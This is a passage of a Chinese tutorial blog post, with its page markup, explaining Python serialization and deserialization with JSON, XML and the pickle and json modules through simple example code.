

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#FFD8F2">
  <meta name="author" content="Sweety">
  <meta name="keywords" content="">
  
    <meta name="description" content="python-序列化与反序列化序列化与反序列化 首先再次明确什么是序列化与反序列化：  序列化：将内存中的不可持久化和传输的对象转换为可方便持久化和传输的对象的过程。 反序列化：序列化的逆过程，将可持久化和传输的对象转换为不可持久化和传输的对象的过程。  在python中：  序列化可以理解为：把python对象编码转换为json格式的字符串。 反序列化可以理解为：把json格式字符串解码为pyt">
<meta property="og:type" content="article">
<meta property="og:title" content="python-序列化与反序列化">
<meta property="og:url" content="https://haoisbinlove.github.io/2024/09/13/python%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8E%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="python-序列化与反序列化序列化与反序列化 首先再次明确什么是序列化与反序列化：  序列化：将内存中的不可持久化和传输的对象转换为可方便持久化和传输的对象的过程。 反序列化：序列化的逆过程，将可持久化和传输的对象转换为不可持久化和传输的对象的过程。  在python中：  序列化可以理解为：把python对象编码转换为json格式的字符串。 反序列化可以理解为：把json格式字符串解码为pyt">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240911145440350.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240913171854479.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240913192823254.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240913214433981.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240913220237278.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240914103831775.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240914162139325.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240914163928577.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240914225108471.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240915134111860.png">
<meta property="article:published_time" content="2024-09-13T15:15:24.000Z">
<meta property="article:modified_time" content="2024-09-15T11:38:47.343Z">
<meta property="article:author" content="Sweety">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240911145440350.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>python-序列化与反序列化 - Hexo</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"haoisbinlove.github.io","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.2.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Sweety Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/24.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.08)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="python-序列化与反序列化"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-09-13 23:15" pubdate>
          2024年9月13日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          5.4k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          45 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">python-序列化与反序列化</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="python-序列化与反序列化"><a href="#python-序列化与反序列化" class="headerlink" title="python-序列化与反序列化"></a>python-序列化与反序列化</h1><h2 id="序列化与反序列化"><a href="#序列化与反序列化" class="headerlink" title="序列化与反序列化"></a>序列化与反序列化</h2><ul>
<li>首先再次明确什么是序列化与反序列化：</li>
</ul>
<p>序列化：将内存中的<code>不可持久化和传输</code>的对象转换为<code>可方便持久化和传输</code>的对象的过程。</p>
<p>反序列化：序列化的逆过程，将<code>可持久化和传输</code>的对象转换为<code>不可持久化和传输</code>的对象的过程。</p>
<ul>
<li>在<strong>python</strong>中：</li>
</ul>
<p>序列化可以理解为：<strong>把python对象编码转换为json格式的字符串</strong>。</p>
<p>反序列化可以理解为：<strong>把json格式字符串解码为python数据对象</strong>。</p>
<ul>
<li>编程为什么需要序列化与反序列化</li>
</ul>
<p>应用场景：</p>
<p><strong>数据交换</strong>：不同应用程序需要共享数据时，由于所处计算机、操作系统或编程语言的不同，序列化数据使得跨越这些边界成为可能。</p>
<p><strong>数据存储</strong>：序列化数据可以有效地保存在文件、数据库或其它持久性存储介质中，以备将来使用。</p>
<p><strong>跨语言通信</strong>：若系统需要与其它编程语言编写的组件进行通信，序列化和反序列化是一种跨语言通信的通用方式。</p>
<p><strong>远程调用</strong>：在分布式系统中。远程调用需要将数据从客户端传输到服务器，并在服务器上执行操作，序列化和反序列化允许这种通信。</p>
<h2 id="常见的数据序列化格式"><a href="#常见的数据序列化格式" class="headerlink" title="常见的数据序列化格式"></a>常见的数据序列化格式</h2><h3 id="JSON"><a href="#JSON" class="headerlink" title="JSON"></a>JSON</h3><p>Json，JavaScript Object Notation（js对象简谱），是一种轻量级的数据交换格式。采用<strong>完全独立于编程语言的文本格式</strong>来存储和表示数据。简洁和清晰的层次结构使得Json成为理想的数据交换语言。</p>
<ul>
<li><strong>为什么使用Json？</strong></li>
</ul>
<p>· 如果要在不同的编程语言之间传递对象，就必须把对象序列化为标准格式，比如XML，但更好的方法是序列化为Json。</p>
<p>· 因为Json表示出来的就是一个字符串，可以被所有语言读取，也可以方便地存储到磁盘或者通过网络传输。</p>
<p>· 而且Json不仅是标准格式，而且它比XML更快，可以直接在web页面中读取，很方便。</p>
<p>· Json在web api、配置文件、日志记录等方面有广泛应用。</p>
<ul>
<li><strong>Json的两种结构</strong></li>
</ul>
<p><strong>”名称&#x2F;值“对的集合</strong></p>
<p>不同编程语言中，它被理解为对象Object、记录Record、结构struct、字典dictionary、哈希表hash table、有键列表keyed list、关联数组associative array、等等。</p>
<p><strong>值的有序列表</strong></p>
<p>在大部分语言中，它被实现为数组array、矢量vector、列表list、序列sequence</p>
<ul>
<li><strong>Json的形式</strong></li>
</ul>
<p>有五种格式：值value、字符串string、数值number、对象object、数组array</p>
<p>其中：</p>
<p>· Json的数值没有使用八进制与十六进制格式哦</p>
<p>· 对象object由左右括号组成，其中名称和值之间通过冒号相连，名称&#x2F;值对之间使用逗号分隔。</p>
<p>Json的格式转换表如下：</p>
<p>json表示的对象就是标准的javascript对象，json和python内置的数据类型对应如下：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240911145440350.png" srcset="/img/loading.gif" lazyload alt="image-20240911145440350"></p>
<h3 id="XML"><a href="#XML" class="headerlink" title="XML"></a>XML</h3><p>xml是一种可扩展的标记语言，用于存储和交换数据。它的结构具有层次性，允许表示复杂的数据结构。</p>
<p>在python中，有多个库用于处理xml数据，包括<strong>xml.etree.ElementTree</strong>和<strong>lxml</strong>。</p>
<ul>
<li>使用xml进行序列化和反序列化</li>
</ul>
<p>创建类对象使用了<strong>xml.etree.ElementTree</strong>的<strong>Element</strong>方法，传入类名的字符串形式。</p>
<p>创建类成员使用了<strong>xml.etree.ElementTree</strong>的<strong>SubElement</strong>方法，传入类对象以及成员名，类成员的值通过 <strong>text</strong> 参数定义。</p>
<p>序列化操作使用了<strong>xml.etree.ElementTree</strong>的<strong>tostring</strong>方法；</p>
<p>反序列化操作使用使用了<strong>xml.etree.ElementTree</strong>的<strong>fromstring</strong>方法；</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># 自定义一个Person类</span><br><span class="hljs-keyword">class</span> <span class="hljs-title class_">Person</span>:<br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">__init__</span>(<span class="hljs-params">self, name, age, isMarried</span>):<br>        self.name = name<br>        self.age = age<br>        self.isMarried = isMarried<br><br><span class="hljs-comment"># 使用xml进行序列化和反序列化</span><br><span class="hljs-keyword">import</span> xml.etree.ElementTree <span class="hljs-keyword">as</span> ET<br><br>data = ET.Element(<span class="hljs-string">&#x27;person&#x27;</span>)<br><span class="hljs-built_in">print</span>(data)  <span class="hljs-comment"># &lt;Element &#x27;person&#x27; at 0x00000268A35F3330&gt;</span><br>name = ET.SubElement(data, <span class="hljs-string">&#x27;name&#x27;</span>)<br>name.text = <span class="hljs-string">&#x27;Alice&#x27;</span><br>age = ET.SubElement(data, <span class="hljs-string">&#x27;age&#x27;</span>)<br>age.text = <span class="hljs-string">&#x27;30&#x27;</span><br>isMarried = ET.SubElement(data, <span class="hljs-string">&#x27;isMarried&#x27;</span>)<br>isMarried.text = <span class="hljs-string">&#x27;False&#x27;</span><br><br>xml_string = ET.tostring(data, encoding=<span class="hljs-string">&#x27;utf-8&#x27;</span>).decode(<span class="hljs-string">&#x27;utf-8&#x27;</span>)   <span class="hljs-comment"># 将xml元素序列化为字符串</span><br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">type</span>(xml_string))  <span class="hljs-comment"># &lt;class &#x27;str&#x27;&gt;</span><br><span class="hljs-built_in">print</span>(xml_string)  <span class="hljs-comment"># &lt;person&gt;&lt;name&gt;Alice&lt;/name&gt;&lt;age&gt;30&lt;/age&gt;&lt;isMarried&gt;False&lt;/isMarried&gt;&lt;/person&gt;</span><br><br>root = ET.fromstring(xml_string)  <span class="hljs-comment"># 将xml字符串反序列化为xml元素</span><br><span class="hljs-built_in">print</span>(root)  <span class="hljs-comment"># &lt;Element &#x27;person&#x27; at 0x00000268A35900E0&gt;</span><br></code></pre></td></tr></table></figure>

<h2 id="python中的序列化与反序列化"><a href="#python中的序列化与反序列化" class="headerlink" title="python中的序列化与反序列化"></a>python中的序列化与反序列化</h2><p>python中提供 <strong>pickle</strong> 和 <strong>json</strong> 两个模块来实现序列化与反序列化。</p>
<p>当然，系统来说，python提供的反序列化的库主要有pickle和cpickle两个，cpickle是python2.x使用的模块，pickle是python3.x使用的模块，在python3.x中取消了cpickle模块。具体参考<a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/668171160">pickle和cPickle模块的区别</a></p>
<p>pickle和json这两个模块均提供了**dump()、dumps()、load()、loads()**这四个函数，dump和dumps用于实现序列化，load和loads用于实现反序列化。</p>
<ul>
<li>资料</li>
</ul>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/chenhuabin/p/10502096.html">Python开发之序列化与反序列化：pickle、json模块使用详解 </a></p>
<p><a target="_blank" rel="noopener" href="https://segmentfault.com/a/1190000044385937">Python数据序列化与反序列化：高效数据交换与存储</a></p>
<p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/650287978">35.Python编程：序列化和反序列化</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/Hardworking666/article/details/112725423">Python序列化与反序列化详解（包括json和json模块详解）</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_57143062/article/details/141560949">Python序列化与反序列化：pickle库使用详解</a></p>
<h3 id="pickle模块"><a href="#pickle模块" class="headerlink" title="pickle模块"></a>pickle模块</h3><p>pickle模块中dump()、dumps()、load()、loads()按功能可划分为两组：</p>
<p>序列化：dump()、dumps()</p>
<p>反序列化：load()、loads()</p>
<p>· dump()和dumps()的区别是：</p>
<blockquote>
<p>dumps()只是单纯地将对象序列化，得到结果</p>
<p>​		dumps(Object)</p>
<p>而dump()会在序列化之后将结果写入到文件当中</p>
<p>​		dump(Object, file Object)</p>
</blockquote>
<p>· 与之对应，load()和loads()的区别是：</p>
<blockquote>
<p>load()会从文件中读取内容进行反序列化</p>
<p>​		load(file Object)</p>
<p>而loads()是对dumps()的序列化结果进行反序列化</p>
<p>​		loads(Serializable Object)</p>
</blockquote>
<p><strong>也就是一个需要结果文件作为中介，另一个不需要</strong>。</p>
<ul>
<li>实操</li>
</ul>
<p>根据上述函数的功能，常将<strong>loads和dumps</strong>、<strong>load和dump</strong>各自分为一组使用。</p>
<p>对于<strong>load和dump</strong>，由于涉及文件的写入和读取，而<strong>pickle</strong>写入的是<strong>二进制数据</strong>，所以打开和读取方式需要使用 <strong>wb</strong> 和 <strong>rb</strong> 。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> pickle<br><br><span class="hljs-comment"># dumps和loads</span><br><br>p_dict = &#123;<span class="hljs-string">&#x27;name&#x27;</span>: <span class="hljs-string">&#x27;张三&#x27;</span>, <span class="hljs-string">&#x27;age&#x27;</span>: <span class="hljs-number">30</span>, <span class="hljs-string">&#x27;isMarried&#x27;</span>: <span class="hljs-literal">False</span>&#125;<br>p_str = pickle.dumps(p_dict)  <span class="hljs-comment"># 序列化</span><br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">type</span>(p_dict))  <span class="hljs-comment"># &lt;class &#x27;dict&#x27;&gt;</span><br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">type</span>(p_str))  <span class="hljs-comment"># &lt;class &#x27;bytes&#x27;&gt;</span><br><span class="hljs-built_in">print</span>(p_str)  <span class="hljs-comment">#  b&#x27;\x80\x04\x95*\x00\x00\x00\x00\x00\x00\x00&#125;\x94(\x8c\x04name\x94\x8c\x06\xe5\xbc\xa0\xe4\xb8\x89\x94\x8c\x03age\x94K\x1e\x8c\tisMarried\x94\x89u.&#x27;</span><br><br>p = pickle.loads(p_str)  <span class="hljs-comment"># 反序列化</span><br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">type</span>(p))  <span class="hljs-comment"># &lt;class &#x27;dict&#x27;&gt;</span><br><span class="hljs-built_in">print</span>(p)  <span class="hljs-comment"># &#123;&#x27;name&#x27;: &#x27;张三&#x27;, &#x27;age&#x27;: 30, &#x27;isMarried&#x27;: False&#125;</span><br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">id</span>(p) == <span class="hljs-built_in">id</span>(p_dict))  <span class="hljs-comment"># 检查目标在序列化和反序列化前后是否为同一对象，结果为false，尽管他们的值相同，但是前后已经不是同一个对象了</span><br><br><br><span class="hljs-comment"># dump和load</span><br><br><span class="hljs-comment"># p_dict = &#123;&#x27;name&#x27;: &#x27;张三&#x27;, &#x27;age&#x27;: 30, &#x27;isMarried&#x27;: False&#125;</span><br><span class="hljs-comment"># 序列化</span><br>file = <span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;my_dump.txt&quot;</span>, <span class="hljs-string">&quot;wb&quot;</span>)  <span class="hljs-comment"># 序列化结果只有bites类型，所以必须以wb模式打开</span><br>pickle.dump(p_dict, file)<br>file.close()<br><br><span class="hljs-comment"># 反序列化</span><br>file = <span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;my_dump.txt&quot;</span>, <span class="hljs-string">&quot;rb&quot;</span>)<br>p = pickle.load(file)<br>file.close()<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">type</span>(p))<br><span class="hljs-built_in">print</span>(p)  <span class="hljs-comment"># 可以看到，操作前后成功还原了p_dict对象数据。即反序列化之后得到的内容和序列化之前的内容完全一样。序列化之后的内容可以方便地保存至磁盘中，电脑关机也不怕了</span><br></code></pre></td></tr></table></figure>

<h3 id="Json模块"><a href="#Json模块" class="headerlink" title="Json模块"></a>Json模块</h3><p>Json模块也提供了和pickle模块一样的dump()、dumps()、load()、loads()四个函数，且函数之间的区别与pickle的区别也是一样的。</p>
<ul>
<li>实操</li>
</ul>
<p>为了应对json中dump和load涉及文件内容的乱码问题，可以<code>将dump和dumps的参数ensure_ascii的值设置为False</code>，如此即能解决序列化后中文乱码的问题。</p>
<p>同样分为dump和load、dumps和loads两组：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># json dumps和loads</span><br><span class="hljs-keyword">import</span> json<br>p_dict = &#123;<span class="hljs-string">&#x27;name&#x27;</span>: <span class="hljs-string">&#x27;张三&#x27;</span>, <span class="hljs-string">&#x27;age&#x27;</span>: <span class="hljs-number">30</span>, <span class="hljs-string">&#x27;isMarried&#x27;</span>: <span class="hljs-literal">False</span>&#125;<br><span class="hljs-comment"># 序列化</span><br>p_str = json.dumps(p_dict)<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">type</span>(p_str))<br><span class="hljs-built_in">print</span>(p_str)   <span class="hljs-comment"># 结果显示，序列化之后得到结果是字符串，但是原中文部分显示为了乱码</span><br><span class="hljs-comment"># 解决方案是使用dumps和dump函数中的ensure_ascii参数，将其值设置为False，可以令序列化后的中文依然正常显示</span><br>p_str2 = json.dumps(p_dict, ensure_ascii=<span class="hljs-literal">False</span>)<br><span class="hljs-built_in">print</span>(p_str2)  <span class="hljs-comment"># &#123;&quot;name&quot;: &quot;张三&quot;, &quot;age&quot;: 30, &quot;isMarried&quot;: false&#125;</span><br><br><span class="hljs-comment"># 反序列化</span><br>p1 = json.loads(p_str)<br><span class="hljs-built_in">print</span>(p1)<br>p2 = json.loads(p_str)<br><span class="hljs-built_in">print</span>(p2)<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">id</span>(p1) == <span class="hljs-built_in">id</span>(p2))  <span class="hljs-comment"># 尽管多次反序列化得到的结果一样，但是他们本质上并不是同一对象</span><br><br><br><span class="hljs-comment"># json dump和load</span><br><span class="hljs-keyword">import</span> json<br>p_dict = &#123;<span class="hljs-string">&#x27;name&#x27;</span>: <span class="hljs-string">&#x27;张三&#x27;</span>, <span class="hljs-string">&#x27;age&#x27;</span>: <span class="hljs-number">30</span>, <span class="hljs-string">&#x27;isMarried&#x27;</span>: <span class="hljs-literal">False</span>&#125;<br><span class="hljs-comment"># 序列化</span><br>file = <span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;json_dump.txt&quot;</span>, <span class="hljs-string">&#x27;w&#x27;</span>)<br>json.dump(p_dict, file, ensure_ascii=<span class="hljs-literal">False</span>)<br>file.close()<br><br><span class="hljs-comment"># 反序列化</span><br>file = <span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;json_dump.txt&quot;</span>, <span class="hljs-string">&#x27;r&#x27;</span>)<br>p = json.load(file)<br>file.close()<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">type</span>(p))<br><span class="hljs-built_in">print</span>(p)<br></code></pre></td></tr></table></figure>

<p>我们发现这里使用json进行反序列化的时候，反序列化的文件中都是只有一行字符串数据。</p>
<p>如果其中有多行数据，也就是其中有多个json数值，那应该怎么处理呢？</p>
<p>首先先要明确哦，json的dump和dumps序列化得到的都是json格式的字符串，也就是json数值。</p>
<ul>
<li>逐行读取json文件，进行反序列化</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(json_path, <span class="hljs-string">&#x27;r&#x27;</span>) <span class="hljs-keyword">as</span> f:<br>	<span class="hljs-keyword">for</span> line <span class="hljs-keyword">in</span> f.readlines():<br>        line = line.strip()    <span class="hljs-comment"># 去除空行</span><br>        <span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(line) != <span class="hljs-number">0</span>:<br>            json_data = json.loads(line)<br></code></pre></td></tr></table></figure>

<ul>
<li>将json文件中的多个json数值合并为一个json对象</li>
</ul>
<p>这个方法需要手动操作，即将各个json数值，使用中括号括起来，之间使用逗号分隔，然后构造json对象：{“dict”: [ ]}。接着就可以使用如下代码进行处理：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(json_path, <span class="hljs-string">&#x27;r&#x27;</span>) <span class="hljs-keyword">as</span> f:<br>    json_data = json.loads(f.read())<br></code></pre></td></tr></table></figure>

<h3 id="区别"><a href="#区别" class="headerlink" title="区别"></a>区别</h3><p>所以，Json模块和pickle模块的区别在于以下两点：</p>
<blockquote>
<p>（1）</p>
<p>pickle模块用于python语言特有的类型和用户自定义类型与python基本数据类型之间的转换</p>
<p>Json模块用于字符串和python数据类型间进行转换</p>
<p>（2）</p>
<p>pickle序列化的结果为bites类型，只适合于python机器之间的交互</p>
<p>Json序列化结果为str类型，能够被多种语言识别，可用于与其它程序设计语言交互</p>
</blockquote>
<ul>
<li>实操</li>
</ul>
<p>自定义一个Person类：姓名、年龄、是否已婚</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">class</span> <span class="hljs-title class_">Person</span>:<br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">__init__</span>(<span class="hljs-params">self, name, age, isMarried</span>):<br>        self.name = name<br>        self.age = age<br>        self.isMarried = isMarried<br></code></pre></td></tr></table></figure>

<blockquote>
<p>注意这里class类的定义：如果对其中的成员直接以 name &#x3D; value 的方式赋初值的话，那么这个自定义类是不会被打包的。需要写一个<code>__init__</code>方法，即如上，<code>def __init__(self, etc)</code></p>
</blockquote>
<p>实例化一个Person对象，尝试使用<strong>pickle</strong>模块对该实例化对象以及Person类本身进行序列化操作。经过实践可以知道<strong>pickle模块能够对类以及类实例对象进行序列化和反序列化</strong>。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># 实例化Person对象</span><br>p = Person(<span class="hljs-string">&#x27;张三&#x27;</span>, <span class="hljs-number">30</span>, <span class="hljs-literal">False</span>)<br><br><span class="hljs-comment"># 使用pickle模块对Person对象进行序列化和反序列化</span><br><span class="hljs-keyword">import</span> pickle<br>pp = 